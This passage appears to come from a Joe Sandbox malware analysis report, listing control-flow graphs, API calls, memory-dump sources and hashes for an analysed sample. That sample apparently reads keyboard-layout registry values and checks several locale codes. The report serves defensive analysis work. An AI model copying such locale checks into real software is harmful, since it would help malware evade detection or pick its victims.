2467b4-2467ba 123->134 135 246858-24687c 123->135 126 246790-246797 call 25d663 124->126 127 24677c-24678a 124->127 126->123 127->111 127->126 137 2467c0-2467ed call 257a00 call 245c10 134->137 138 246880-246885 135->138 152 2467f1-246818 call 2422c0 137->152 153 2467ef 137->153 138->138 140 246887-2468ec call 2580c0 * 2 138->140 149 2468ee-2468fd 140->149 150 246919-246936 call 25cff1 140->150 154 24690f-246916 call 25d663 149->154 155 2468ff-24690d 149->155 162 246849-24684c 152->162 163 24681a-246829 152->163 153->152 154->150 155->115 155->154 162->137 166 246852 162->166 164 24683f-246846 call 25d663 163->164 165 24682b-246839 163->165 164->162 165->104 165->164 166->135
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,88D95C5C,88D95C5C), ref: 00245DCC
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(88D95C5C,?,00000000,00000000,?,00000400,?,?,00000000,00000001,88D95C5C,88D95C5C), ref: 00245DFA
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(88D95C5C,?,?,00000000,00000001,88D95C5C,88D95C5C), ref: 00245E06
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-1112634906
                                                                                                                                                                                                                                                                                          • Opcode ID: 431f5680ebca237da8f5b5f3fbda0c473135941ab8926f1a418f1666b8669be3
                                                                                                                                                                                                                                                                                          • Instruction ID: 3c633b80644008ebfab6834561ab99ce9aba4477b7aa9990c520185cf3032a40
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 431f5680ebca237da8f5b5f3fbda0c473135941ab8926f1a418f1666b8669be3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDC23771A101189BDF28DF28CC89BEDB779EF45304F144299E809E72C2DB719AA8CF55
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ConditionVariableWake
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1192502693-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ef83e1f4aa64a54b6237f5249e7d6ee9a41caef575e3392c6fe9bf174b9a1e3b
                                                                                                                                                                                                                                                                                          • Instruction ID: aeb4dc05039d7d558901fbc66051fd4520c4596ba6cffdb7cf5d1c6c27f0acd4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef83e1f4aa64a54b6237f5249e7d6ee9a41caef575e3392c6fe9bf174b9a1e3b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37727B71A202449BEB1CEF38DC89B9DBB79EB45300F508259F815A73C1DB359AA4CF91

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 1577 27652b-276538 call 27a302 1580 27655a-27656c call 27656d ExitProcess 1577->1580 1581 27653a-276548 GetPEB 1577->1581 1581->1580 1582 27654a-276559 1581->1582 1582->1580
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,0027652A,?,?,?,?,?,00277661), ref: 00276567
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9067950627a96d871ed4ef9ddbcfcdd5043eebce21995614e369e8b6f467dd23
                                                                                                                                                                                                                                                                                          • Instruction ID: b9e432bd97aeca1722d2cd6ff121ec2f463202d678726c819af13967b5cb1195
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9067950627a96d871ed4ef9ddbcfcdd5043eebce21995614e369e8b6f467dd23
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9E0C230020508AFCF25BF58C91DD8D3B2AEF51756F608804FE0C4A626CB35EDB1DA80
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354013479.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 460e35afef55ab26bc4085e39f0b0d4669516518542474850714c3075a685137
                                                                                                                                                                                                                                                                                          • Instruction ID: c0e15e3164bdf3c22b096193158cf5f991c407b016af3204ccf074f710d25752
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 460e35afef55ab26bc4085e39f0b0d4669516518542474850714c3075a685137
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B01F6FB38C211BD716195556F18AF7677DE6C6730330C826F40BC1502F2946A496132

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 169 245c10-245cf7 call 245940 call 2459e0 call 244b30 178 245d21-245d3c call 25cff1 169->178 179 245cf9-245d05 169->179 180 245d17-245d1e call 25d663 179->180 181 245d07-245d15 179->181 180->178 181->180 183 245d42-245e23 call 276c6a call 2740f0 RegOpenKeyExA RegCloseKey 181->183 193 245e26-245e2b 183->193 193->193 194 245e2d-245e86 call 2580c0 193->194 198 245eb0-245ecc call 25cff1 194->198 199 245e88-245e94 194->199 200 245ea6-245ead call 25d663 199->200 201 245e96-245ea4 199->201 200->198 201->200 204 245ecd-245fde call 276c6a 201->204 214 245fe0-245fec 204->214 215 246008-246015 call 25cff1 204->215 217 245ffe-246005 call 25d663 214->217 218 245fee-245ffc 214->218 217->215 218->217 220 246016-24658e call 276c6a call 25e150 call 2580c0 * 5 218->220 243 246590-24659f 220->243 244 2465bb-2465d6 call 25cff1 220->244 245 2465b1-2465b8 call 25d663 243->245 246 2465a1-2465af 243->246 245->244 246->245 249 2465d7-2466b8 call 276c6a call 257a00 call 245c10 246->249 264 2466bc-2466db call 2422c0 249->264 265 2466ba 249->265 268 24670c-246712 264->268 269 2466dd-2466ec 264->269 265->264 272 246715-24671a 268->272 270 246702-246709 call 25d663 269->270 271 2466ee-2466fc 269->271 270->268 271->270 273 246937 call 276c6a 271->273 272->272 275 24671c-246744 call 257a00 call 245c10 272->275 280 24693c call 276c6a 273->280 285 246746 275->285 286 246748-246769 call 2422c0 275->286 284 246941-246d6f call 276c6a call 258200 call 276c6a 280->284 285->286 292 24679a-2467ae 286->292 293 24676b-24677a 286->293 303 2467b4-2467ba 292->303 304 246858-24687c 292->304 295 246790-246797 call 25d663 293->295 296 24677c-24678a 293->296 295->292 296->280 296->295 306 2467c0-2467ed call 257a00 call 245c10 303->306 307 246880-246885 304->307 321 2467f1-246818 call 2422c0 306->321 322 2467ef 306->322 307->307 309 246887-2468ec call 2580c0 * 2 307->309 318 2468ee-2468fd 309->318 319 246919-246936 call 25cff1 309->319 323 24690f-246916 call 25d663 318->323 324 2468ff-24690d 318->324 331 246849-24684c 321->331 332 24681a-246829 321->332 322->321 323->319 324->284 324->323 331->306 335 246852 331->335 333 24683f-246846 call 25d663 332->333 334 24682b-246839 332->334 333->331 334->273 334->333 335->304
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
